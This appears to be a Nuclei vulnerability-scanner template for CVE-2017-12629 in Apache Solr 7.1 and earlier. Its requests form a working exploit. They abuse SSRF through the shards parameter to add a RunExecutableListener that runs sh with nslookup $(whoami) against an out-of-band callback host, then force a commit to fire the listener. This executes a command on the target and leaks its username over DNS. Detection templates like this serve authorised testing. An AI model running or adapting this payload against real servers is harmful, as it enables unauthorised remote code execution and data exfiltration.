id: CVE-2017-12629

info:
  name: Apache Solr <= 7.1 Remote Code Execution via SSRF
  author: dwisiswant0
  severity: critical
  tags: cve,cve2017,solr,apache,rce,ssrf,oob
  reference: |
      - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
      - https://twitter.com/honoki/status/1298636315613974532/photo/1

requests:
  - raw:
      - |
        GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"